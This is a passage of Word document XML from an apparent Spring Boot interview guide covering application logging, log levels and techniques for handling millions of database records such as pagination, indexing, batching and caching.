    <w:p w14:paraId="04E9FB04"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fileNamePattern&gt;logs/myapp-%d{yyyy-MM-dd}.log&lt;/fileNamePattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F7BEE"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maxHistory&gt;30&lt;/maxHistory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47522B22"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rollingPolicy&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364D90BE" w14:textId="77777777" w:rsidR="00E16296"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80FD2A1">
          <v:rect id="_x0000_i2699" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B6973F" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Centralized Logging (Optional in Production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD53E00"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production, we often integrate with centralized logging systems like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B87857"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LK Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Elasticsearch, Logstash, Kibana)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED82A3"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Graylog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B989AD"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lunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E358E2"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Fluentd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D5C84A"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WS CloudWatch</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if deployed on AWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B71B830"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allows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B40CA4"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al-time log search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55A528"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Dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD9E24"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lerts based on log patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29987DCE" w14:textId="77777777" w:rsidR="00E16296"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2100E61">
          <v:rect id="_x0000_i2700" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F208D" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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5. Log Levels Us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8"/>
        <w:gridCol w:w="3347"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="17365917" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77309D75" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F158259" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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Usage Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="6F7C403A" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B048925"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RACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="180E165A"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Detailed, step-by-step tracing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="40CAE332" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB8E07E"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DEBUG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B88F926"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eful during development</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="667D0722" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="427ADE70"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FO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB45064"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Key events like start/stop, endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="3D50958C" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65879876"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ARN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF0E367"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otential issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="556FF950" w14:textId="77777777" w:rsidTr="00E16296">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5785FF5D"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RROR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AA27504" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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ceptions and failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AB2A24C" w14:textId="4FE6E7E3"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0142546">
          <v:rect id="_x0000_i2701" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F2BFE7" w14:textId="054D89FF" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00347A87">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="654" w:name="_Toc196308134"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have millions of data then how will you manage it</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="654"/>
    </w:p>
    <w:p w14:paraId="59AC5B37" w14:textId="55467442" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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To manage </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>millions of records</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently in a Spring Boot application, we use a combination of </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database strategies</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code optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>infrastructure tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44342A57" w14:textId="77777777" w:rsidR="00A24A9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DED1438">
          <v:rect id="_x0000_i2702" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="204931E3" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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1. Pagination &amp; Sorting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330B829E" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA's PagingAndSortingRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Pageable interface to load data in chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EC73B" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Page&lt;Employee&gt; getAllEmployees(Pageable pageable) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E087C" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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employeeRepository.findAll(pageable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA86605" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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05EBA16" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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GET /employees?page=0&amp;size=50&amp;sort=name,asc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15C9E3" w14:textId="77777777" w:rsidR="00A24A9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B2D84F5">
          <v:rect id="_x0000_i2703" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EEF8E3" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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2. Database Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CED3C4" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Add proper </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on columns used in WHERE, ORDER BY, and JOIN clauses to speed up queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9EBBA1" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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REATE INDEX idx_employee_department ON employee(department_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690D684" w14:textId="77777777" w:rsidR="00A24A9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C5271F6">
          <v:rect id="_x0000_i2704" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D828DA6" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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3. Streaming Large Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0480F159" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA Stream</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JDBC ResultSet streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to process huge results without loading everything in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7A737" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Query("SELECT e FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96D88C" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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tream&lt;Employee&gt; streamAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE5E74" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Remember to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>close the stream</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7A820C" w14:textId="77777777" w:rsidR="00A24A9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1EAC4BB">
          <v:rect id="_x0000_i2705" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DBF495" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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4. Batch Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2642B319" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Batch</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for processing large datasets in background jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD9E0C" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0515A4" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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hunk-based reading/writing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C01E8" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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try/fault-tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F81E625" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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cheduling &amp; parallel execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0566CA26" w14:textId="77777777" w:rsidR="00A24A9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68A1605">
          <v:rect id="_x0000_i2706" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365C9D4" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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5. Async Processing &amp; Queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FCA26F" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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For data-intensive operations, offload work using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F03CB0" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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sync methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5506E8" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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Kafka, RabbitMQ, or ActiveMQ (messaging queues)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6AA07" w14:textId="77777777" w:rsidR="00A24A9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A7BA0B8">
          <v:rect id="_x0000_i2707" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5ADC7" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Database Partitioning &amp; Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02487FF7" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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artition large tables based on time/region/user_id to distribute the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3261E3F3" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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hard data across multiple databases or tables if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072A41D" w14:textId="77777777" w:rsidR="00A24A9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3D1AA0E">
          <v:rect id="_x0000_i2708" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="790EDE46" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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7. Caching Frequently Used Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A721971" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Redis, Caffeine, or EhCache to reduce DB load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1646E131" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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acheable("employeeSummary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3839BFCF" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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EmployeeSummary getSummary(Long id) { ... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A804C15" w14:textId="77777777" w:rsidR="00A24A9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D75B48D">
          <v:rect id="_x0000_i2709" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F379FA" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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8. Archive Old Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B3614" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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Move old or rarely accessed data to an </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>archive table/database</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7650F8" w14:textId="77777777" w:rsidR="00A24A9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79C5A6B">
          <v:rect id="_x0000_i2710" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CFA50" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A94"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9. Optimize SQL Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB75B9" w14:textId="77777777" w:rsidR="00A24A94" w:rsidRPr="002C6305" w:rsidRDefault="00A24A9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void SELECT *, use projections, limit joins, and monitor slow queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29821AA2" w14:textId="6119BC83"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E52FF52">
          <v:rect id="_x0000_i2711" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C84726" w14:textId="125B2AC2" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004C2251">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="655" w:name="_Toc196308135"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between REST API and Http</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
